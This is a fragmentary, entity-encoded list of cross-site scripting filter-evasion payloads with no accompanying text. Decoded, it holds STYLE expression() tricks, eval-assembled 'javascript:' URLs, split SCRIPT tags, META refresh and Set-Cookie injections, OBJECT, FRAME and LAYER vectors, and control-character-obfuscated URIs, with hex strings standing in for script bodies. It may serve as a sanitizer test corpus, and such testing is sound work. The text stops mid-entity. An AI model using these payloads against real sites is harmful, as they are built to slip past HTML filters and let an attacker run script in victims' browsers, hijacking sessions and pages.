8;&amp;#x35;&amp;#x35;&amp;#x30;&amp;#x66;&amp;#x65;&amp;#x37;&amp;#x65;&amp;#x32;&amp;#x61;&amp;#x61;&amp;#x36;&amp;#x38;&amp;#x65;&amp;#x65;&amp;#x63;&amp;#x66;&amp;#x39;&amp;#x33;&amp;#x65;&amp;#x65;&amp;#x35;&amp;#x30;&amp;#x39;&amp;#x30;&amp;#x31;&amp;#x63;&amp;#x32;&amp;#x32;&amp;#x61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4;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x3d;&amp;#x22;&amp;#x78;&amp;#x73;&amp;#x73;&amp;#x3a;&amp;#x65;&amp;#x78;&amp;#x70;&amp;#x72;&amp;#x2f;&amp;#x2a;&amp;#x30;&amp;#x66;&amp;#x35;&amp;#x34;&amp;#x64;&amp;#x63;&amp;#x65;&amp;#x34;&amp;#x64;&amp;#x34;&amp;#x37;&amp;#x31;&amp;#x39;&amp;#x31;&amp;#x62;&amp;#x35;&amp;#x33;&amp;#x61;&amp;#x62;&amp;#x35;&amp;#x39;&amp;#x62;&amp;#x62;&amp;#x30;&amp;#x61;&amp;#x66;&amp;#x30;&amp;#x35;&amp;#x64;&amp;#x62;&amp;#x64;&amp;#x34;&amp;#x2a;&amp;#x2f;&amp;#x65;&amp;#x73;&amp;#x73;&amp;#x69;&amp;#x6f;&amp;#x6e;&amp;#x28;&amp;#x30;&amp;#x66;&amp;#x35;&amp;#x34;&amp;#x64;&amp;#x63;&amp;#x65;&amp;#x34;&amp;#x64;&amp;#x34;&amp;#x37;&amp;#x31;&amp;#x39;&amp;#x31;&amp;#x62;&amp;#x35;&amp;#x33;&amp;#x61;&amp;#x62;&amp;#x35;&amp;#x39;&amp;#x62;&amp;#x62;&amp;#x30;&amp;#x61;&amp;#x66;&amp;#x30;&amp;#x35;&amp;#x64;&amp;#x62;&amp;#x64;&amp;#x34;&amp;#x2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38;&amp;#x64;&amp;#x34;&amp;#x37;&amp;#x35;&amp;#x36;&amp;#x65;&amp;#x61;&amp;#x33;&amp;#x30;&amp;#x66;&amp;#x34;&amp;#x32;&amp;#x64;&amp;#x34;&amp;#x35;&amp;#x61;&amp;#x35;&amp;#x39;&amp;#x34;&amp;#x66;&amp;#x62;&amp;#x62;&amp;#x30;&amp;#x63;&amp;#x64;&amp;#x61;&amp;#x63;&amp;#x39;&amp;#x65;&amp;#x31;&amp;#x61;&amp;#x20;&amp;#x53;&amp;#x54;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x3d;&amp;#x22;&amp;#x78;&amp;#x73;&amp;#x73;&amp;#x3a;&amp;#x65;&amp;#x78;&amp;#x70;&amp;#x72;&amp;#x65;&amp;#x73;&amp;#x73;&amp;#x69;&amp;#x6f;&amp;#x6e;&amp;#x28;&amp;#x38;&amp;#x64;&amp;#x34;&amp;#x37;&amp;#x35;&amp;#x36;&amp;#x65;&amp;#x61;&amp;#x33;&amp;#x30;&amp;#x66;&amp;#x34;&amp;#x32;&amp;#x64;&amp;#x34;&amp;#x35;&amp;#x61;&amp;#x35;&amp;#x39;&amp;#x34;&amp;#x66;&amp;#x62;&amp;#x62;&amp;#x30;&amp;#x63;&amp;#x64;&amp;#x61;&amp;#x63;&amp;#x39;&amp;#x65;&amp;#x31;&amp;#x61;&amp;#x2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54;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x20;&amp;#x54;&amp;#x59;&amp;#x50;&amp;#x45;&amp;#x3d;&amp;#x22;&amp;#x74;&amp;#x65;&amp;#x78;&amp;#x74;&amp;#x2f;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x22;&amp;#x3e;&amp;#x32;&amp;#x61;&amp;#x63;&amp;#x61;&amp;#x30;&amp;#x39;&amp;#x32;&amp;#x65;&amp;#x66;&amp;#x37;&amp;#x31;&amp;#x39;&amp;#x34;&amp;#x63;&amp;#x37;&amp;#x64;&amp;#x65;&amp;#x30;&amp;#x61;&amp;#x37;&amp;#x39;&amp;#x66;&amp;#x64;&amp;#x62;&amp;#x32;&amp;#x38;&amp;#x31;&amp;#x31;&amp;#x65;&amp;#x39;&amp;#x35;&amp;#x36;&amp;#x3c;&amp;#x2f;&amp;#x53;&amp;#x54;&amp;#x59;&amp;#x4c;&amp;#x4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54;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x3e;&amp;#x2e;&amp;#x34;&amp;#x66;&amp;#x31;&amp;#x33;&amp;#x64;&amp;#x35;&amp;#x36;&amp;#x63;&amp;#x38;&amp;#x62;&amp;#x62;&amp;#x34;&amp;#x32;&amp;#x61;&amp;#x35;&amp;#x37;&amp;#x30;&amp;#x39;&amp;#x66;&amp;#x65;&amp;#x61;&amp;#x30;&amp;#x36;&amp;#x31;&amp;#x66;&amp;#x64;&amp;#x31;&amp;#x37;&amp;#x37;&amp;#x61;&amp;#x38;&amp;#x30;&amp;#x7b;&amp;#x62;&amp;#x61;&amp;#x63;&amp;#x6b;&amp;#x67;&amp;#x72;&amp;#x6f;&amp;#x75;&amp;#x6e;&amp;#x64;&amp;#x2d;&amp;#x69;&amp;#x6d;&amp;#x61;&amp;#x67;&amp;#x65;&amp;#x3a;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x28;&amp;#x22;&amp;#x34;&amp;#x66;&amp;#x31;&amp;#x33;&amp;#x64;&amp;#x35;&amp;#x36;&amp;#x63;&amp;#x38;&amp;#x62;&amp;#x62;&amp;#x34;&amp;#x32;&amp;#x61;&amp;#x35;&amp;#x37;&amp;#x30;&amp;#x39;&amp;#x66;&amp;#x65;&amp;#x61;&amp;#x30;&amp;#x36;&amp;#x31;&amp;#x66;&amp;#x64;&amp;#x31;&amp;#x37;&amp;#x37;&amp;#x61;&amp;#x38;&amp;#x30;&amp;#x22;&amp;#x29;&amp;#x3b;&amp;#x7d;&amp;#x3c;&amp;#x2f;&amp;#x53;&amp;#x54;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x3e;&amp;#x3c;&amp;#x41;&amp;#x20;&amp;#x43;&amp;#x4c;&amp;#x41;&amp;#x53;&amp;#x53;&amp;#x3d;&amp;#x34;&amp;#x66;&amp;#x31;&amp;#x33;&amp;#x64;&amp;#x35;&amp;#x36;&amp;#x63;&amp;#x38;&amp;#x62;&amp;#x62;&amp;#x34;&amp;#x32;&amp;#x61;&amp;#x35;&amp;#x37;&amp;#x30;&amp;#x39;&amp;#x66;&amp;#x65;&amp;#x61;&amp;#x30;&amp;#x36;&amp;#x31;&amp;#x66;&amp;#x64;&amp;#x31;&amp;#x37;&amp;#x37;&amp;#x61;&amp;#x38;&amp;#x30;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x41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54;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x20;&amp;#x74;&amp;#x79;&amp;#x70;&amp;#x65;&amp;#x3d;&amp;#x22;&amp;#x74;&amp;#x65;&amp;#x78;&amp;#x74;&amp;#x2f;&amp;#x63;&amp;#x73;&amp;#x73;&amp;#x22;&amp;#x3e;&amp;#x42;&amp;#x4f;&amp;#x44;&amp;#x59;&amp;#x7b;&amp;#x62;&amp;#x61;&amp;#x63;&amp;#x6b;&amp;#x67;&amp;#x72;&amp;#x6f;&amp;#x75;&amp;#x6e;&amp;#x64;&amp;#x3a;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x28;&amp;#x22;&amp;#x35;&amp;#x37;&amp;#x34;&amp;#x36;&amp;#x62;&amp;#x31;&amp;#x33;&amp;#x31;&amp;#x33;&amp;#x61;&amp;#x37;&amp;#x39;&amp;#x64;&amp;#x65;&amp;#x32;&amp;#x34;&amp;#x63;&amp;#x32;&amp;#x37;&amp;#x37;&amp;#x31;&amp;#x66;&amp;#x34;&amp;#x30;&amp;#x66;&amp;#x32;&amp;#x34;&amp;#x37;&amp;#x38;&amp;#x31;&amp;#x31;&amp;#x65;&amp;#x22;&amp;#x29;&amp;#x7d;&amp;#x3c;&amp;#x2f;&amp;#x53;&amp;#x54;&amp;#x59;&amp;#x4c;&amp;#x4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21;&amp;#x2d;&amp;#x2d;&amp;#x5b;&amp;#x69;&amp;#x66;&amp;#x20;&amp;#x67;&amp;#x74;&amp;#x65;&amp;#x20;&amp;#x49;&amp;#x45;&amp;#x20;&amp;#x34;&amp;#x5d;&amp;#x3e;&amp;#x64;&amp;#x38;&amp;#x34;&amp;#x35;&amp;#x35;&amp;#x37;&amp;#x35;&amp;#x30;&amp;#x39;&amp;#x31;&amp;#x30;&amp;#x39;&amp;#x63;&amp;#x61;&amp;#x61;&amp;#x65;&amp;#x34;&amp;#x35;&amp;#x61;&amp;#x32;&amp;#x65;&amp;#x65;&amp;#x33;&amp;#x66;&amp;#x35;&amp;#x64;&amp;#x63;&amp;#x65;&amp;#x38;&amp;#x38;&amp;#x65;&amp;#x33;&amp;#x3c;&amp;#x21;&amp;#x5b;&amp;#x65;&amp;#x6e;&amp;#x64;&amp;#x69;&amp;#x66;&amp;#x5d;&amp;#x2d;&amp;#x2d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1;&amp;#x53;&amp;#x45;&amp;#x20;&amp;#x48;&amp;#x52;&amp;#x45;&amp;#x46;&amp;#x3d;&amp;#x22;&amp;#x36;&amp;#x64;&amp;#x37;&amp;#x33;&amp;#x30;&amp;#x36;&amp;#x36;&amp;#x30;&amp;#x35;&amp;#x65;&amp;#x35;&amp;#x64;&amp;#x37;&amp;#x32;&amp;#x37;&amp;#x64;&amp;#x31;&amp;#x61;&amp;#x63;&amp;#x63;&amp;#x32;&amp;#x37;&amp;#x64;&amp;#x37;&amp;#x39;&amp;#x38;&amp;#x62;&amp;#x65;&amp;#x33;&amp;#x30;&amp;#x33;&amp;#x30;&amp;#x2f;&amp;#x2f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f;&amp;#x42;&amp;#x4a;&amp;#x45;&amp;#x43;&amp;#x54;&amp;#x20;&amp;#x63;&amp;#x6c;&amp;#x61;&amp;#x73;&amp;#x73;&amp;#x69;&amp;#x64;&amp;#x3d;&amp;#x63;&amp;#x6c;&amp;#x73;&amp;#x69;&amp;#x64;&amp;#x3a;&amp;#x61;&amp;#x65;&amp;#x32;&amp;#x34;&amp;#x66;&amp;#x64;&amp;#x61;&amp;#x65;&amp;#x2d;&amp;#x30;&amp;#x33;&amp;#x63;&amp;#x36;&amp;#x2d;&amp;#x31;&amp;#x31;&amp;#x64;&amp;#x31;&amp;#x2d;&amp;#x38;&amp;#x62;&amp;#x37;&amp;#x36;&amp;#x2d;&amp;#x30;&amp;#x30;&amp;#x38;&amp;#x30;&amp;#x63;&amp;#x37;&amp;#x34;&amp;#x34;&amp;#x66;&amp;#x33;&amp;#x38;&amp;#x39;&amp;#x3e;&amp;#x3c;&amp;#x70;&amp;#x61;&amp;#x72;&amp;#x61;&amp;#x6d;&amp;#x20;&amp;#x6e;&amp;#x61;&amp;#x6d;&amp;#x65;&amp;#x3d;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x20;&amp;#x76;&amp;#x61;&amp;#x6c;&amp;#x75;&amp;#x65;&amp;#x3d;&amp;#x66;&amp;#x65;&amp;#x61;&amp;#x65;&amp;#x34;&amp;#x37;&amp;#x33;&amp;#x31;&amp;#x38;&amp;#x38;&amp;#x34;&amp;#x34;&amp;#x63;&amp;#x32;&amp;#x61;&amp;#x62;&amp;#x34;&amp;#x32;&amp;#x33;&amp;#x64;&amp;#x34;&amp;#x61;&amp;#x35;&amp;#x37;&amp;#x32;&amp;#x32;&amp;#x33;&amp;#x61;&amp;#x31;&amp;#x63;&amp;#x32;&amp;#x36;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x4f;&amp;#x42;&amp;#x4a;&amp;#x45;&amp;#x43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61;&amp;#x3d;&amp;#x22;&amp;#x67;&amp;#x65;&amp;#x74;&amp;#x22;&amp;#x3b;&amp;#x62;&amp;#x3d;&amp;#x22;&amp;#x55;&amp;#x52;&amp;#x4c;&amp;#x28;&amp;#x22;&amp;#x22;&amp;#x3b;&amp;#x63;&amp;#x3d;&amp;#x22;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x22;&amp;#x3b;&amp;#x64;&amp;#x3d;&amp;#x22;&amp;#x38;&amp;#x38;&amp;#x38;&amp;#x30;&amp;#x36;&amp;#x37;&amp;#x32;&amp;#x36;&amp;#x62;&amp;#x39;&amp;#x63;&amp;#x38;&amp;#x64;&amp;#x63;&amp;#x34;&amp;#x37;&amp;#x64;&amp;#x64;&amp;#x62;&amp;#x37;&amp;#x33;&amp;#x33;&amp;#x32;&amp;#x66;&amp;#x32;&amp;#x65;&amp;#x64;&amp;#x30;&amp;#x64;&amp;#x38;&amp;#x64;&amp;#x37;&amp;#x22;&amp;#x29;&amp;#x22;&amp;#x3b;&amp;#x65;&amp;#x76;&amp;#x61;&amp;#x6c;&amp;#x28;&amp;#x61;&amp;#x2b;&amp;#x62;&amp;#x2b;&amp;#x63;&amp;#x2b;&amp;#x64;&amp;#x29;&amp;#x3b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3f;&amp;#x20;&amp;#x65;&amp;#x63;&amp;#x68;&amp;#x6f;&amp;#x28;&amp;#x27;&amp;#x3c;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x29;&amp;#x27;&amp;#x3b;&amp;#x65;&amp;#x63;&amp;#x68;&amp;#x6f;&amp;#x28;&amp;#x27;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x3e;&amp;#x32;&amp;#x37;&amp;#x38;&amp;#x64;&amp;#x39;&amp;#x39;&amp;#x30;&amp;#x63;&amp;#x66;&amp;#x61;&amp;#x63;&amp;#x61;&amp;#x38;&amp;#x66;&amp;#x35;&amp;#x33;&amp;#x32;&amp;#x39;&amp;#x63;&amp;#x36;&amp;#x64;&amp;#x63;&amp;#x39;&amp;#x62;&amp;#x61;&amp;#x65;&amp;#x39;&amp;#x34;&amp;#x36;&amp;#x64;&amp;#x34;&amp;#x65;&amp;#x3c;&amp;#x2f;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x3e;&amp;#x27;&amp;#x29;&amp;#x3b;&amp;#x20;&amp;#x3f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d;&amp;#x45;&amp;#x54;&amp;#x41;&amp;#x20;&amp;#x48;&amp;#x54;&amp;#x54;&amp;#x50;&amp;#x2d;&amp;#x45;&amp;#x51;&amp;#x55;&amp;#x49;&amp;#x56;&amp;#x3d;&amp;#x22;&amp;#x53;&amp;#x65;&amp;#x74;&amp;#x2d;&amp;#x43;&amp;#x6f;&amp;#x6f;&amp;#x6b;&amp;#x69;&amp;#x65;&amp;#x22;&amp;#x20;&amp;#x43;&amp;#x6f;&amp;#x6e;&amp;#x74;&amp;#x65;&amp;#x6e;&amp;#x74;&amp;#x3d;&amp;#x22;&amp;#x55;&amp;#x53;&amp;#x45;&amp;#x52;&amp;#x49;&amp;#x44;&amp;#x3d;&amp;#x26;&amp;#x6c;&amp;#x74;&amp;#x3b;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x26;&amp;#x67;&amp;#x74;&amp;#x3b;&amp;#x37;&amp;#x34;&amp;#x61;&amp;#x63;&amp;#x33;&amp;#x37;&amp;#x65;&amp;#x33;&amp;#x62;&amp;#x36;&amp;#x31;&amp;#x66;&amp;#x37;&amp;#x66;&amp;#x34;&amp;#x35;&amp;#x39;&amp;#x65;&amp;#x65;&amp;#x66;&amp;#x63;&amp;#x39;&amp;#x64;&amp;#x37;&amp;#x31;&amp;#x39;&amp;#x33;&amp;#x35;&amp;#x35;&amp;#x38;&amp;#x32;&amp;#x65;&amp;#x26;&amp;#x6c;&amp;#x74;&amp;#x3b;&amp;#x2f;&amp;#x53;&amp;#x43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x26;&amp;#x67;&amp;#x74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43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x68;&amp;#x74;&amp;#x74;&amp;#x70;&amp;#x3a;&amp;#x2f;&amp;#x2f;&amp;#x31;&amp;#x32;&amp;#x37;&amp;#x2e;&amp;#x30;&amp;#x2e;&amp;#x30;&amp;#x2e;&amp;#x31;&amp;#x3e;&amp;#x38;&amp;#x34;&amp;#x33;&amp;#x37;&amp;#x66;&amp;#x39;&amp;#x37;&amp;#x35;&amp;#x39;&amp;#x37;&amp;#x32;&amp;#x66;&amp;#x34;&amp;#x62;&amp;#x63;&amp;#x32;&amp;#x36;&amp;#x39;&amp;#x35;&amp;#x35;&amp;#x31;&amp;#x30;&amp;#x34;&amp;#x36;&amp;#x39;&amp;#x33;&amp;#x30;&amp;#x61;&amp;#x31;&amp;#x65;&amp;#x31;&amp;#x30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26;&amp;#x31;&amp;#x34;&amp;#x3b;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x62;&amp;#x34;&amp;#x63;&amp;#x63;&amp;#x64;&amp;#x37;&amp;#x34;&amp;#x30;&amp;#x35;&amp;#x32;&amp;#x63;&amp;#x30;&amp;#x63;&amp;#x36;&amp;#x35;&amp;#x62;&amp;#x37;&amp;#x66;&amp;#x37;&amp;#x33;&amp;#x61;&amp;#x37;&amp;#x64;&amp;#x35;&amp;#x33;&amp;#x65;&amp;#x65;&amp;#x33;&amp;#x38;&amp;#x38;&amp;#x36;&amp;#x6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6a;&amp;#x61;&amp;#x76;&amp;#x26;&amp;#x23;&amp;#x78;&amp;#x30;&amp;#x44;&amp;#x3b;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x66;&amp;#x33;&amp;#x64;&amp;#x34;&amp;#x31;&amp;#x65;&amp;#x33;&amp;#x30;&amp;#x37;&amp;#x65;&amp;#x63;&amp;#x39;&amp;#x34;&amp;#x30;&amp;#x39;&amp;#x35;&amp;#x38;&amp;#x61;&amp;#x62;&amp;#x62;&amp;#x31;&amp;#x30;&amp;#x65;&amp;#x34;&amp;#x64;&amp;#x39;&amp;#x32;&amp;#x62;&amp;#x66;&amp;#x31;&amp;#x66;&amp;#x31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d;&amp;#x2d;&amp;#x2d;&amp;#x20;&amp;#x3c;&amp;#x49;&amp;#x4d;&amp;#x47;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x20;&amp;#x26;&amp;#x23;&amp;#x31;&amp;#x34;&amp;#x3b;&amp;#x20;&amp;#x20;&amp;#x65;&amp;#x66;&amp;#x37;&amp;#x33;&amp;#x62;&amp;#x32;&amp;#x61;&amp;#x35;&amp;#x37;&amp;#x63;&amp;#x30;&amp;#x39;&amp;#x39;&amp;#x61;&amp;#x38;&amp;#x62;&amp;#x38;&amp;#x34;&amp;#x33;&amp;#x36;&amp;#x30;&amp;#x61;&amp;#x31;&amp;#x36;&amp;#x39;&amp;#x31;&amp;#x65;&amp;#x34;&amp;#x36;&amp;#x37;&amp;#x36;&amp;#x37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d;&amp;#x2d;&amp;#x2d;&amp;#x20;&amp;#x3c;&amp;#x49;&amp;#x4d;&amp;#x47;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x64;&amp;#x37;&amp;#x35;&amp;#x39;&amp;#x64;&amp;#x63;&amp;#x31;&amp;#x31;&amp;#x31;&amp;#x39;&amp;#x37;&amp;#x38;&amp;#x61;&amp;#x34;&amp;#x39;&amp;#x63;&amp;#x66;&amp;#x39;&amp;#x66;&amp;#x61;&amp;#x33;&amp;#x33;&amp;#x37;&amp;#x35;&amp;#x65;&amp;#x35;&amp;#x30;&amp;#x63;&amp;#x34;&amp;#x61;&amp;#x33;&amp;#x35;&amp;#x22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43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x3e;&amp;#x61;&amp;#x3d;&amp;#x2f;&amp;#x35;&amp;#x61;&amp;#x31;&amp;#x39;&amp;#x63;&amp;#x36;&amp;#x36;&amp;#x32;&amp;#x31;&amp;#x30;&amp;#x62;&amp;#x38;&amp;#x33;&amp;#x63;&amp;#x30;&amp;#x31;&amp;#x30;&amp;#x33;&amp;#x32;&amp;#x32;&amp;#x66;&amp;#x63;&amp;#x32;&amp;#x37;&amp;#x65;&amp;#x38;&amp;#x64;&amp;#x32;&amp;#x66;&amp;#x65;&amp;#x38;&amp;#x31;&amp;#x2f;&amp;#x61;&amp;#x6c;&amp;#x65;&amp;#x72;&amp;#x74;&amp;#x28;&amp;#x61;&amp;#x2e;&amp;#x73;&amp;#x6f;&amp;#x75;&amp;#x72;&amp;#x63;&amp;#x65;&amp;#x29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d;&amp;#x2d;&amp;#x2d;&amp;#x20;&amp;#x22;&amp;#x3b;&amp;#x63;&amp;#x39;&amp;#x64;&amp;#x31;&amp;#x34;&amp;#x36;&amp;#x39;&amp;#x61;&amp;#x64;&amp;#x33;&amp;#x64;&amp;#x62;&amp;#x61;&amp;#x61;&amp;#x37;&amp;#x34;&amp;#x62;&amp;#x64;&amp;#x66;&amp;#x30;&amp;#x32;&amp;#x35;&amp;#x31;&amp;#x62;&amp;#x65;&amp;#x62;&amp;#x61;&amp;#x63;&amp;#x39;&amp;#x64;&amp;#x38;&amp;#x63;&amp;#x3b;&amp;#x2f;&amp;#x2f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d;&amp;#x45;&amp;#x54;&amp;#x41;&amp;#x20;&amp;#x48;&amp;#x54;&amp;#x54;&amp;#x50;&amp;#x2d;&amp;#x45;&amp;#x51;&amp;#x55;&amp;#x49;&amp;#x56;&amp;#x6f;&amp;#x22;&amp;#x72;&amp;#x65;&amp;#x66;&amp;#x72;&amp;#x65;&amp;#x73;&amp;#x68;&amp;#x22;&amp;#x20;&amp;#x43;&amp;#x4f;&amp;#x4e;&amp;#x54;&amp;#x45;&amp;#x4e;&amp;#x54;&amp;#x3d;&amp;#x22;&amp;#x30;&amp;#x3b;&amp;#x20;&amp;#x55;&amp;#x52;&amp;#x4c;&amp;#x3d;&amp;#x68;&amp;#x74;&amp;#x74;&amp;#x70;&amp;#x3a;&amp;#x2f;&amp;#x2f;&amp;#x3b;&amp;#x55;&amp;#x52;&amp;#x4c;&amp;#x3d;&amp;#x66;&amp;#x64;&amp;#x35;&amp;#x66;&amp;#x30;&amp;#x64;&amp;#x34;&amp;#x31;&amp;#x64;&amp;#x66;&amp;#x63;&amp;#x66;&amp;#x30;&amp;#x32;&amp;#x36;&amp;#x62;&amp;#x62;&amp;#x64;&amp;#x33;&amp;#x34;&amp;#x34;&amp;#x33;&amp;#x66;&amp;#x63;&amp;#x31;&amp;#x33;&amp;#x35;&amp;#x33;&amp;#x65;&amp;#x65;&amp;#x64;&amp;#x61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43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x20;&amp;#x3c;&amp;#x42;&amp;#x3e;&amp;#x3d;&amp;#x61;&amp;#x64;&amp;#x62;&amp;#x38;&amp;#x65;&amp;#x64;&amp;#x31;&amp;#x34;&amp;#x33;&amp;#x31;&amp;#x38;&amp;#x63;&amp;#x61;&amp;#x35;&amp;#x31;&amp;#x66;&amp;#x39;&amp;#x61;&amp;#x36;&amp;#x32;&amp;#x30;&amp;#x64;&amp;#x33;&amp;#x32;&amp;#x34;&amp;#x64;&amp;#x63;&amp;#x36;&amp;#x38;&amp;#x64;&amp;#x64;&amp;#x61;&amp;#x22;&amp;#x3e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6;&amp;#x52;&amp;#x41;&amp;#x4d;&amp;#x45;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x31;&amp;#x34;&amp;#x38;&amp;#x35;&amp;#x62;&amp;#x33;&amp;#x37;&amp;#x35;&amp;#x39;&amp;#x65;&amp;#x65;&amp;#x35;&amp;#x34;&amp;#x35;&amp;#x39;&amp;#x34;&amp;#x63;&amp;#x39;&amp;#x64;&amp;#x36;&amp;#x37;&amp;#x64;&amp;#x64;&amp;#x62;&amp;#x65;&amp;#x35;&amp;#x64;&amp;#x39;&amp;#x35;&amp;#x66;&amp;#x62;&amp;#x66;&amp;#x20;&amp;#x3c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43;&amp;#x52;&amp;#x49;&amp;#x50;&amp;#x54;&amp;#x3e;&amp;#x61;&amp;#x3d;&amp;#x2f;&amp;#x36;&amp;#x39;&amp;#x61;&amp;#x31;&amp;#x34;&amp;#x36;&amp;#x34;&amp;#x39;&amp;#x35;&amp;#x39;&amp;#x36;&amp;#x64;&amp;#x31;&amp;#x39;&amp;#x62;&amp;#x39;&amp;#x35;&amp;#x66;&amp;#x39;&amp;#x36;&amp;#x36;&amp;#x64;&amp;#x63;&amp;#x65;&amp;#x61;&amp;#x39;&amp;#x65;&amp;#x34;&amp;#x30;&amp;#x30;&amp;#x63;&amp;#x31;&amp;#x2f;&amp;#x6e;&amp;#x36;&amp;#x39;&amp;#x61;&amp;#x31;&amp;#x34;&amp;#x36;&amp;#x34;&amp;#x39;&amp;#x35;&amp;#x39;&amp;#x36;&amp;#x64;&amp;#x31;&amp;#x39;&amp;#x62;&amp;#x39;&amp;#x35;&amp;#x66;&amp;#x39;&amp;#x36;&amp;#x36;&amp;#x64;&amp;#x63;&amp;#x65;&amp;#x61;&amp;#x39;&amp;#x65;&amp;#x34;&amp;#x30;&amp;#x30;&amp;#x63;&amp;#x31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c;&amp;#x41;&amp;#x59;&amp;#x45;&amp;#x52;&amp;#x20;&amp;#x53;&amp;#x52;&amp;#x43;&amp;#x3d;&amp;#x22;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x63;&amp;#x34;&amp;#x33;&amp;#x62;&amp;#x39;&amp;#x65;&amp;#x39;&amp;#x36;&amp;#x34;&amp;#x38;&amp;#x62;&amp;#x31;&amp;#x62;&amp;#x61;&amp;#x34;&amp;#x38;&amp;#x63;&amp;#x65;&amp;#x33;&amp;#x38;&amp;#x39;&amp;#x66;&amp;#x31;&amp;#x62;&amp;#x64;&amp;#x33;&amp;#x38;&amp;#x66;&amp;#x35;&amp;#x31;&amp;#x30;&amp;#x38;&amp;#x3e;&amp;#x3c;&amp;#x2f;&amp;#x4c;&amp;#x41;&amp;#x59;&amp;#x45;&amp;#x5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54;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x3e;&amp;#x6c;&amp;#x69;&amp;#x20;&amp;#x7b;&amp;#x6c;&amp;#x69;&amp;#x73;&amp;#x74;&amp;#x2d;&amp;#x73;&amp;#x74;&amp;#x79;&amp;#x6c;&amp;#x65;&amp;#x2d;&amp;#x69;&amp;#x6d;&amp;#x61;&amp;#x67;&amp;#x65;&amp;#x3a;&amp;#x20;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x28;&amp;#x22;&amp;#x35;&amp;#x37;&amp;#x39;&amp;#x35;&amp;#x38;&amp;#x34;&amp;#x35;&amp;#x34;&amp;#x36;&amp;#x32;&amp;#x64;&amp;#x61;&amp;#x32;&amp;#x39;&amp;#x38;&amp;#x39;&amp;#x66;&amp;#x36;&amp;#x38;&amp;#x32;&amp;#x61;&amp;#x63;&amp;#x62;&amp;#x36;&amp;#x32;&amp;#x37;&amp;#x35;&amp;#x66;&amp;#x31;&amp;#x34;&amp;#x63;&amp;#x37;&amp;#x3c;&amp;#x2f;&amp;#x53;&amp;#x54;&amp;#x59;&amp;#x4c;&amp;#x45;&amp;#x3e;&amp;#x3c;&amp;#x55;&amp;#x4c;&amp;#x3e;&amp;#x3c;&amp;#x4c;&amp;#x49;&amp;#x3e;&amp;#x35;&amp;#x37;&amp;#x39;&amp;#x35;&amp;#x38;&amp;#x34;&amp;#x35;&amp;#x34;&amp;#x36;&amp;#x32;&amp;#x64;&amp;#x61;&amp;#x32;&amp;#x39;&amp;#x38;&amp;#x39;&amp;#x66;&amp;#x36;&amp;#x38;&amp;#x32;&amp;#x61;&amp;#x63;&amp;#x62;&amp;#x36;&amp;#x32;&amp;#x37;&amp;#x35;&amp;#x66;&amp;#x31;&amp;#x34;&amp;#x63;&amp;#x37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1;&amp;#x63;&amp;#x6b;&amp;#x67;&amp;#x72;&amp;#x6f;&amp;#x75;&amp;#x6e;&amp;#x64;&amp;#x2d;&amp;#x69;&amp;#x6d;&amp;#x61;&amp;#x67;&amp;#x65;&amp;#x3a;&amp;#x20;&amp;#x75;&amp;#x72;&amp;#x6c;&amp;#x28;&amp;#x26;&amp;#x23;&amp;#x31;&amp;#x3b;&amp;#x6a;&amp;#x61;&amp;#x76;&amp;#x61;&amp;#x73;&amp;#x63;&amp;#x72;&amp;#x69;&amp;#x70;&amp;#x74;&amp;#x3a;&amp;#x39;&amp;#x62;&amp;#x33;&amp;#x32;&amp;#x62;&amp;#x62;&amp;#x36;&amp;#x39;&amp;#x35;&amp;#x39;&amp;#x32;&amp;#x63;&amp;#x61;&amp;#x39;&amp;#x35;&amp;#x39;&amp;#x31;&amp;#x38;&amp;#x66;&amp;#x37;&amp;#x33;&amp;#x66;&amp;#x63;&amp;#x61;&amp;#x32;&amp;#x61;&amp;#x34;&amp;#x62;&amp;#x35;&amp;#x32;&amp;#x36;&amp;#x65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8;&amp;#x45;&amp;#x41;&amp;#x44;&amp;#x3e;&amp;#x3c;&amp;#x4d;&amp;#x45;&amp;#x54;&amp;#x41;&amp;#x20;&